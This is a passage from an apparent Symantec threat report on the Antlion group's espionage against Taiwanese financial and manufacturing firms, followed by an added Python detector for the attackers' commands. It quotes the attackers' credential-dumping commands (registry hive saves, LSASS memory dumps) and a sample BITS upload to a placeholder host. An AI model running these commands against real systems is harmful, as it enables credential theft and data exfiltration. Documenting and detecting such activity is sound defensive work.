case study below, Antlion compromised the networks of at least two other organizations in Taiwan, including another financial organization and a manufacturing company. The activity the group carried out on those networks was largely similar to the activity that is detailed in the case study, with the xPack backdoor frequently deployed and a lot of evidence of credential dumping. In the manufacturing target, also, we see the attackers attempting to download malicious files via SMB shares.
The attackers also spent a significant amount of time on both these targeted networks, spending close to 250 days on the financial organization and around 175 days on the manufacturing organization.
Symantec, a division of Broadcom, cannot state with certainty what the initial infection vector used by the attackers in this campaign was, though in one instance they were seen utilizing the MSSQL service to execute system commands, which indicates that the most likely infection vector was exploitation of a web application or service. However, Antlion are also known to have previously used malicious emails to gain initial access to victim networks.
The main custom backdoor used by Antlion in this campaign was the xPack backdoor, which is a custom .NET loader that decrypts (AES), loads, and executes accompanying .bin files. Its decryption password is provided as a command-line argument (Base64 encoded string), and xPack is intended to be run as a standalone application or as a service (xPackSvc variant). The xPack malware and its associated payload seems to be used for initial access; it appears that xPack was predominantly used to execute system commands, drop subsequent malware and tools, and stage data for exfiltration. The attackers also used a custom keylogger and three custom loaders.
- EHAGBPSL loader – custom loader written in C++ – loaded by JpgRun loader
- JpgRun loader – custom loader written in C++ – similar to xPack, reads the decryption key and filename from the command line – decodes the file and executes it
- CheckID – custom loader written in C++ – based on loader used by BlackHole RAT
The attackers also used a custom SMB session enumeration tool (NetSessionEnum), a custom bind/reverse file transfer tool named ENCODE MMC, and a Kerberos golden ticket tool based on Mimikatz.
The attackers also used a variety of off-the-shelf tools, as well as leveraging living-off-the-land tools such as PowerShell, WMIC, ProcDump (used to dump LSASS process memory), and PsExec. The legitimate AnyDesk tool was also abused by the attackers for remote access in one of the victim organizations. The attackers were also observed leveraging exploits such as CVE-2019-1458 for privilege escalation, and remote scheduled tasks to execute their backdoor. CVE-2019-1458 is an elevation-of-privilege vulnerability that occurs in Windows when the Win32k component fails to properly handle objects in memory.
Legitimate versions of WinRAR appear to have been exploited by the attackers for data exfiltration, while there is also evidence of data exfiltration via PowerShell, specifically using the BitsTransfer module to initiate an upload to attacker-controlled infrastructure. There is also evidence that the attackers likely automated the data collection process via batch scripts, while there is also evidence of instances where data was likely staged for further exfiltration, though it was not actually observed being exfiltrated from the network. In these instances, it appears the attackers were interested in collecting information from software pertaining to business contacts, investments, and smart card readers.
Case study: Attack on a financial organization
The attackers spent a significant amount of time on victims’ networks, and deployed both custom and off-the-shelf malware. In one financial sector victim in Taiwan the attackers spent almost nine months on the victim network.
The first suspicious activity on this victim network occurred in December 2020 when WMIC was used to execute two commands:
- wmic process get CSName,Description,ExecutablePath,ProcessId /format:"CSIDL_SYSTEM\wbem\zh-tw\htable.xsl"
- wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"CSIDL_SYSTEM\wbem\zh-tw\htable.xsl"
The first command was used to list the computer name, description of processes, executable path, and process ID. The output was written to a suspicious file named htable.xsl under the wbem directory. The second command was used to collect information about the system, which was written out to the same file (htable.xsl). Information collected included:
- Version of the operating system (OS)
- The installation date
- The last time the system was booted
- The local date and time of the system
- The manufacturer
- The registered user
- Service pack information – this can be used to determine what patches are installed
- System directory path
Five minutes after those commands were issued, WMIC was used to dump credentials:
- reg save HKLM\SAM CSIDL_COMMON_DOCUMENTS\sam.hiv
- reg save HKLM\SYSTEM CSIDL_COMMON_DOCUMENTS\sys.hiv
- reg save hklm\security CSIDL_COMMON_DOCUMENTS\security.hiv
The commands listed above were all executed via Antlion’s custom xPack backdoor.
Several days later, during the Christmas holiday period, the attackers returned over a period of a few days and executed the xPack backdoor again. They also executed an unknown VBS script via PsExec multiple times:
- "cscript.exe" CSIDL_SYSTEM_DRIVE\update.vbs
On December 28, the attackers used xPack to launch a command prompt to dump credentials from several machines within the compromised organization with the following commands:
- upload.exe -accepteula -ma lsass.exe 16.dmp (a renamed version of Sysinternals procdump64.exe)
- reg save hklm\sam CSIDL_PROFILE\public\sam.hive
- reg save hklm\system CSIDL_PROFILE\public\system.hive
- reg save hklm\security CSIDL_PROFILE\public\security.hive
Over the following couple of weeks, the attackers continued to return intermittently to launch the xPack backdoor or to dump credentials via the registry. Then, following a few weeks of inactivity, they became active on the infected network once again.
The attackers used the xPack backdoor to launch a command prompt to execute the following commands:
- "cmd" /K CHCP 950
- CHCP 950
- query user
- "CSIDL_SYSTEM\quser.exe"
- tasklist /v
- findstr explorer
- cmd /c dir "CSIDL_PROFILE\desktop"
- CSIDL_SYSTEM\cmd.exe /c cmd /c dir users /b
- cmd /c dir "CSIDL_PROFILE\desktop"
- cmd /c dir users /b
- reg save hklm\security CSIDL_COMMON_DOCUMENTS\security.hiv
- rar a -r -hp1qaz@WSX3edc!@# W22-009-099.tmp "CSIDL_COMMON_DOCUMENTS\w22-009-099_file"
- reg save hklm\system CSIDL_COMMON_DOCUMENTS\system.hiv
- reg save hklm\sam CSIDL_COMMON_DOCUMENTS\sam.hiv
The commands above first changed the code page to 950, the Windows code page for Traditional Chinese. The attackers then executed 'query user' to list any logged-in users on the system, and ran 'tasklist /v' to get a verbose list of all running processes, filtering that list with 'findstr explorer' to check for an interactive desktop session. They then listed the contents of the Desktop directory and the Users directory. After this, the attackers dumped credentials again via the registry and used RAR to pack collected files into a password-protected archive (the -hp switch) under the common documents directory, a typical staging step before exfiltration.
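The command sequences in this case study (registry hive saves, the renamed ProcDump run against LSASS, WMIC with a /format: target under wbem, password-protected RAR staging) and the PowerShell BitsTransfer upload mentioned earlier are all visible in process-creation telemetry. The following detector is an added example written for this article, not Symantec's code or tooling: it runs a handful of rules over constructed process-creation events modelled on the commands above, and separately reports hosts where the full SAM/SYSTEM/SECURITY hive set was saved. The event field names, the host names, and the expanded example paths standing in for the CSIDL_ placeholders are assumptions for the sample data.

```python
"""Added example, not from the Symantec report: rule-based detection of the
Antlion command patterns over constructed process-creation events."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str      # assumed field: reporting host
    image: str     # assumed field: executable path as logged
    cmdline: str   # assumed field: full command line


# (rule name, regex applied to the command line)
RULES = [
    # reg.exe saving the SAM/SYSTEM/SECURITY hives to disk for offline credential recovery
    ("registry_hive_dump",
     re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b", re.I)),
    # full memory dump of lsass.exe; matched on arguments rather than image name,
    # because the report shows procdump64.exe renamed to upload.exe
    ("lsass_memory_dump", re.compile(r"\s-ma\s+lsass(?:\.exe)?\b", re.I)),
    # WMIC whose /format: argument points at an .xsl under the wbem directory
    ("wmic_xsl_output_in_wbem",
     re.compile(r'\bwmic\b.*?/format:"?[^"\s]*\\wbem\\[^"\s]*\.xsl', re.I)),
    # RAR archive created with a header-encrypting password (-hp), i.e. staging
    ("password_protected_rar_staging", re.compile(r"\brar(?:\.exe)?\s+a\b.*\s-hp\S+", re.I)),
    # PowerShell BITS job configured as an upload to a remote destination
    ("bits_upload", re.compile(r"Start-BitsTransfer\b.*-TransferType\s+Upload", re.I)),
]
HIVE_RE = re.compile(r"\bhklm\\(sam|system|security)\b", re.I)


def detect(events):
    """Return (host, rule, cmdline) for every event that matches a rule."""
    return [(ev.host, name, ev.cmdline)
            for ev in events for name, rx in RULES if rx.search(ev.cmdline)]


def summarize_by_host(findings):
    """Map each host to the sorted list of distinct rule names that fired on it."""
    per_host = defaultdict(set)
    for host, rule, _ in findings:
        per_host[host].add(rule)
    return {host: sorted(rules) for host, rules in per_host.items()}


def hosts_with_complete_hive_set(events):
    """Hosts where SAM, SYSTEM and SECURITY were all saved. SAM plus SYSTEM is
    what is needed to recover local account hashes offline, so this set is a
    stronger signal than a single hive save."""
    seen = defaultdict(set)
    for ev in events:
        if RULES[0][1].search(ev.cmdline):
            seen[ev.host].add(HIVE_RE.search(ev.cmdline).group(1).lower())
    return sorted(h for h, hives in seen.items() if hives >= {"sam", "system", "security"})


# Constructed sample events modelled on the report's commands; hosts and paths are made up.
SAMPLE_EVENTS = [
    ProcEvent("FIN-WS01", r"C:\Windows\System32\wbem\WMIC.exe",
              r'wmic process get CSName,Description,ExecutablePath,ProcessId /format:"C:\Windows\System32\wbem\zh-tw\htable.xsl"'),
    ProcEvent("FIN-WS01", r"C:\Windows\System32\reg.exe", r"reg save HKLM\SAM C:\Users\Public\Documents\sam.hiv"),
    ProcEvent("FIN-WS01", r"C:\Windows\System32\reg.exe", r"reg save HKLM\SYSTEM C:\Users\Public\Documents\sys.hiv"),
    ProcEvent("FIN-WS01", r"C:\Windows\System32\reg.exe", r"reg save hklm\security C:\Users\Public\Documents\security.hiv"),
    ProcEvent("FIN-WS02", r"C:\Users\Public\upload.exe", "upload.exe -accepteula -ma lsass.exe 16.dmp"),
    ProcEvent("FIN-WS02", r"C:\Program Files\WinRAR\rar.exe",
              r'rar a -r -hpEXAMPLEPASS W22-009-099.tmp "C:\Users\Public\Documents\w22-009-099_file"'),
    ProcEvent("FIN-WS03", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -c Start-BitsTransfer -Source C:\Users\Public\Documents\W22-009-099.tmp -Destination http://example.invalid/u -TransferType Upload"),
    ProcEvent("FIN-WS03", r"C:\Windows\System32\reg.exe", r"reg save HKLM\SAM C:\Users\Public\Documents\sam.hiv"),
    ProcEvent("FIN-WS04", r"C:\Windows\System32\cmd.exe", r"cmd /c dir C:\Users /b"),  # benign, no rule fires
]

if __name__ == "__main__":
    for host, rule, cmd in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}: {cmd}")
    print("complete hive set on:", hosts_with_complete_hive_set(SAMPLE_EVENTS))
```

The rules key on arguments rather than image names because the report shows the attackers renaming ProcDump; the benign `dir` event on FIN-WS04 shows that plain directory listings from the same sequence are not flagged on their own, and FIN-WS03 (SAM saved without SYSTEM) shows why the hive-set check is reported separately from the per-command rule.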
The attackers returned to the network a couple of weeks later and carried out largely the same activity. They remained active on the network throughout March, April, and May 2021, intermittently returning to launch their xPack backdoor or dump credentials from the registry. Dumping credentials appears to be a main focus of the attackers, who likely used these credentials to move laterally across the network and identify machines of interest from which they could exfiltrate data.
The last activity on this network, after a gap of three months, occurred in August 2021, when the attackers returned and listed all available shares. They then dumped credentials from the registry and proceeded to collect account, group, and workstation configuration information.
They then dumped credentials from the registry once again. This was the last activity seen on this network.
Experienced actor stays active
Antlion is believed to have been involved in espionage activities since at least 2011, and this recent activity shows that it is still an actor to be aware of more than 10 years after it first appeared.
The length of time that Antlion was able to spend on victim networks is notable: the group spent several months on victim networks, affording plenty of time to seek out and exfiltrate potentially sensitive information from infected organizations. The targeting of Taiwan is perhaps unsurprising given that Chinese state-backed groups are known to be interested in organizations in that region.
Protection
For the latest protection updates, please visit the Symantec Protection Bulletin.
Indicators of Compromise (IOCs)
If an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.